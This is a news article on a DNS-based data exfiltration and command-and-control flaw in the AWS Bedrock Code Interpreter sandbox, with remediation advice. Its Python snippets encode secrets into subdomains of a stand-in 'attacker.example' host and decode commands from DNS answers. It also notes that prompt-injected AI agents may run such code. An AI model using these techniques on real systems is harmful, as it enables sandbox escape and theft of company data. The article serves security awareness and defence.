Security researchers have uncovered a vulnerability in an artificial intelligence tool from Amazon Web Services that could allow attackers to exfiltrate sensitive company data. The issue affects the Code Interpreter used in AWS Bedrock, a platform designed to help companies build and run generative AI applications.
The discovery comes from Phantom Labs, the research arm of identity security company BeyondTrust. According to the researchers, the flaw could allow attackers to bypass the isolation environment designed to protect systems running AI-generated code.
AWS Bedrock allows developers to build AI-powered tools such as chatbots and automated agents that can write and execute code. The Code Interpreter feature is central to this process: it runs generated code inside a restricted sandbox environment that is supposed to isolate execution from the rest of the internet and from the company's infrastructure.
Because of this sandbox, even if the AI generates unsafe code, the environment should prevent that code from communicating with external systems or leaking sensitive data.
However, Phantom Labs researcher Kinnaird McQuade discovered that the sandbox does not completely block outbound communication. While most internet traffic is restricted, the system still allows certain DNS queries, specifically A and AAAA record lookups.
DNS queries are normally used to translate domain names into IP addresses so that systems can locate servers on the Internet. But the researchers found that these queries can be used for something very different.
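For context, an ordinary A-record lookup is a one-line operation in most languages. A minimal Python illustration (using `localhost` so it works without internet access):

```python
import socket

# An A-record lookup: ask the system resolver to map a hostname
# to an IPv4 address. This is the legitimate purpose of DNS.
ipv4 = socket.gethostbyname("localhost")
print(ipv4)  # typically "127.0.0.1"
```

The key point is that this lookup travels outside the local machine to a resolver, which is exactly the property the exfiltration technique abuses.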
By embedding small pieces of encoded data inside DNS requests, attackers could secretly transmit information out of the sandbox environment. The team demonstrated that this method can create a hidden communication channel between the isolated AI system and an external server.
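A minimal sketch of how such smuggling can work (the domain `attacker.example` and helper below are hypothetical, not BeyondTrust's actual tooling): the secret bytes are base32-encoded into DNS-safe characters, split into labels of at most 63 characters, and prepended as subdomains of a domain whose authoritative nameserver the attacker controls. Resolving each resulting hostname then carries the data to the attacker's server.

```python
import base64

MAX_LABEL = 63  # DNS limits each label to 63 characters

def encode_exfil_names(secret: bytes, domain: str) -> list[str]:
    """Pack secret bytes into hostnames that respect DNS label rules."""
    # Base32 keeps the payload within DNS-safe characters (A-Z, 2-7).
    payload = base64.b32encode(secret).decode().rstrip("=")
    labels = [payload[i:i + MAX_LABEL] for i in range(0, len(payload), MAX_LABEL)]
    # Group a few labels per query: <chunk1>.<chunk2>.<chunk3>.attacker.example
    return [".".join(labels[i:i + 3] + [domain]) for i in range(0, len(labels), 3)]

names = encode_exfil_names(b"AKIAEXAMPLEKEY:secret-value", "attacker.example")
for name in names:
    print(name)  # in an attack, each name would be resolved with an A lookup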
To prove the risk, the researchers developed a proof-of-concept system that used DNS queries to establish a command-and-control channel. Commands could be sent to the interpreter through specially crafted DNS responses, while the output of those commands could be returned through encoded subdomain requests.
With this approach, the researchers achieved an interactive shell inside the sandboxed environment, meaning an attacker could run commands remotely and receive their output without being stopped by the sandbox's network restrictions.
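One way such a channel can operate (a simplified sketch, not the researchers' actual implementation): the attacker's nameserver answers each lookup with A records whose four octets carry command bytes, and code inside the sandbox reassembles them.

```python
def decode_command(a_records: list[str]) -> str:
    """Reassemble a command from the octets of attacker-controlled A records."""
    data = bytearray()
    for addr in a_records:
        data.extend(int(octet) for octet in addr.split("."))
    # A zero octet marks the end of the command (padding).
    return data.split(b"\x00")[0].decode()

# Example: the "IP addresses" below spell out a command, one byte per octet.
fake_answers = ["105.100.32.45", "117.0.0.0"]  # bytes of "id -u"
print(decode_command(fake_answers))  # prints "id -u"
```

Command output would then flow back out through encoded subdomain lookups, as described above, closing the loop.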
The risk becomes especially serious when the interpreter has access to cloud resources. The research showed that the interpreter can interact with services such as Amazon S3 if its assigned identity role allows it. During testing, the team was able to list storage buckets and retrieve files containing simulated customer records, API keys, and financial data. All of this information was then exfiltrated through DNS queries.
The vulnerability was first reported to AWS in September 2025 through its vulnerability disclosure program. By November, AWS had deployed a fix intended to block the data leakage. However, the patch was later rolled back due to technical issues.
In December, AWS informed the researchers that it would not release another patch. Instead, the company updated its documentation to clarify how the sandbox environment works and noted that DNS resolution is allowed in this mode.
The vulnerability received a severity score of 7.5 out of 10 under the CVSS rating system. As part of the bug bounty program, the researcher received a $100 gift card for the Amazon Gear Shop.
The discovery also highlights a broader challenge in the rapidly evolving AI ecosystem. Many modern AI tools are no longer limited to generating text: they can write scripts, execute commands, and interact with cloud infrastructure directly, which expands the potential attack surface. If attackers can manipulate an AI agent through prompt injection, malicious datasets, or compromised dependencies, the agent may execute harmful code without recognizing it as such.
Code Interpreter environments are particularly sensitive because they often run with permissions that allow access to internal data or cloud services. If those permissions are too broad, an attacker could potentially use the AI system itself as a gateway to sensitive resources.
The researchers recommend that organizations review how their Bedrock environments are configured, especially the permissions granted to Code Interpreter roles. Limiting access to only the resources that are absolutely necessary can significantly reduce the impact of such attacks.
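As an illustration of that least-privilege principle, an interpreter execution role can be scoped to a single read-only path in one bucket rather than broad S3 access (the bucket name and path below are placeholders, not an AWS-published policy):

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["s3:GetObject"],
      "Resource": "arn:aws:s3:::example-interpreter-bucket/inputs/*"
    }
  ]
}
```

With a policy shaped like this, even a compromised interpreter session could read only the designated input objects, not enumerate buckets or touch credentials stored elsewhere.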
Companies that require stronger network isolation are also advised to run the interpreter in controlled network environments rather than relying on the default sandbox configuration.